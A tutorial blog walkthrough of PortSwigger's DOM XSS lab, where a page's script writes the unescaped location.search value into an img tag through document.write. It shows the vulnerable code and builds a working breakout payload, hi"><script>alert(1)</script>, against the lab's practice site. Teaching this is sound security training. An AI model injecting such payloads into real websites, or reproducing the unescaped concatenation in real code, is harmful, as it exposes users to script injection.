PortSwigger's "DOM XSS in document.write sink using source location.search" Walkthrough



This is the first of the three Apprentice-level DOM-based XSS labs from PortSwigger. Before we get started, you’ll need a PortSwigger Academy account. This blog post shows how to solve the lab manually.

After logging in, head over to the lab, located at https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink. You can find this through the Academy learning path list, or linked within the DOM-based XSS blog post.

Challenge Information

Click the “Access the Lab” button and you will be taken to a temporary website that is created for your account. The URL will be in the format https://<random string here>.web-security-academy.net/.

This is a DOM-based XSS attack. This means that our malicious input will be read from a “source” by client-side code and passed to a “sink” that supports dynamic code execution, such as a JavaScript or jQuery function call.



The website looks like this:



If we input “hi” as our search parameter, then open up Dev Tools, we can see a <script> section with the following contents:

function trackSearch(query) {

document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');

}

var query = (new URLSearchParams(window.location.search)).get('search');

if(query) {

trackSearch(query);



}Our input of “hi” has generated the following output in the <img> tag (viewed using Dev Tools):

We can see that our input (“hi”) is concatenated into the string passed to the document.write call. The script reads it from the URL via location.search and writes it, unescaped, into the src attribute of the <img> tag, so this is our attack entry point.
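To make that flow concrete, here is a minimal sketch that can be run in Node without a browser. It only rebuilds the string the page hands to document.write(); buildTrackerMarkup is a hypothetical helper name introduced for illustration, and the hard-coded search string stands in for window.location.search.

```javascript
// Hypothetical helper (not part of the lab's code): returns the exact string
// that trackSearch() passes to document.write().
function buildTrackerMarkup(query) {
  return '<img src="/resources/images/tracker.gif?searchTerms=' + query + '">';
}

// Source: stand-in for window.location.search after searching for "hi".
const searchString = '?search=hi';
const searchTerm = new URLSearchParams(searchString).get('search');

// Sink input: this string is what the browser would parse as HTML.
const trackerMarkup = buildTrackerMarkup(searchTerm);
console.log(trackerMarkup);
// <img src="/resources/images/tracker.gif?searchTerms=hi">
```

Nothing between the source and the sink encodes or filters the value, which is why whatever we type ends up verbatim in the markup.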

Lab Solution

What happens if we try to break out of the quoted src attribute of the <img> tag, so that we can inject our own content?

Let’s try a search input of:



hi"<script>alert(1)</script>Here’s the result:

Clearly we managed to mess something up in the HTML, so this is promising. If we look at the HTML in Dev Tools, it looks like this:

We were able to inject our input into the page via the document.write() call that creates the <img> tag, but it’s still not quite right. The coloring in this screenshot hints at a syntax error: the script tag isn’t being recognized as its own element, but is instead tacked onto the end of the <img> tag.
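We can reproduce the string behind that broken markup outside the browser. The sketch below is an approximation, not a real HTML parser: it assumes the <img> tag ends at the first > in the string, which holds here because our quote has already closed the src value. buildTrackerMarkup is again a hypothetical helper that mirrors the lab's concatenation.

```javascript
// Hypothetical helper mirroring the concatenation inside trackSearch().
function buildTrackerMarkup(query) {
  return '<img src="/resources/images/tracker.gif?searchTerms=' + query + '">';
}

const firstAttempt = buildTrackerMarkup('hi"<script>alert(1)</script>');
console.log(firstAttempt);
// <img src="/resources/images/tracker.gif?searchTerms=hi"<script>alert(1)</script>">

// Approximation: treat everything up to the first ">" as the <img> tag.
const imgTagAsParsed = firstAttempt.slice(0, firstAttempt.indexOf('>') + 1);
console.log(imgTagAsParsed);
// <img src="/resources/images/tracker.gif?searchTerms=hi"<script>
```

The quote ends the src value, but the <img> tag itself is still open, so the text `<script` is swallowed as part of that tag instead of starting a new element.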





If we add a closing > before we begin our malicious script tag, the search payload looks like this:

    hi"><script>alert(1)</script>

And there’s our alert!
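As a rough check of why this version works, the sketch below splits the generated string at the first >, using the same simplifying assumption as before (this is string slicing, not a real HTML parser). buildTrackerMarkup is a hypothetical helper, and the encoded search string at the end is only an illustration of what could be pasted after the lab's base URL.

```javascript
// Hypothetical helper mirroring the concatenation inside trackSearch().
function buildTrackerMarkup(query) {
  return '<img src="/resources/images/tracker.gif?searchTerms=' + query + '">';
}

const payload = 'hi"><script>alert(1)</script>';
const exploitMarkup = buildTrackerMarkup(payload);

// The "> in the payload now closes both the src attribute and the <img> tag.
const closedImgTag = exploitMarkup.slice(0, exploitMarkup.indexOf('>') + 1);
const injectedRemainder = exploitMarkup.slice(closedImgTag.length);
console.log(closedImgTag);      // <img src="/resources/images/tracker.gif?searchTerms=hi">
console.log(injectedRemainder); // <script>alert(1)</script>">

// Percent-encode the payload for use in the address bar, then confirm that
// URLSearchParams decodes it back to the original string.
const encodedSearch = '?search=' + encodeURIComponent(payload);
const decodedPayload = new URLSearchParams(encodedSearch).get('search');
console.log(decodedPayload === payload); // true
```

The leftover `">` after the script element comes from the original template and ends up as stray text on the page.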

The updated HTML looks like this: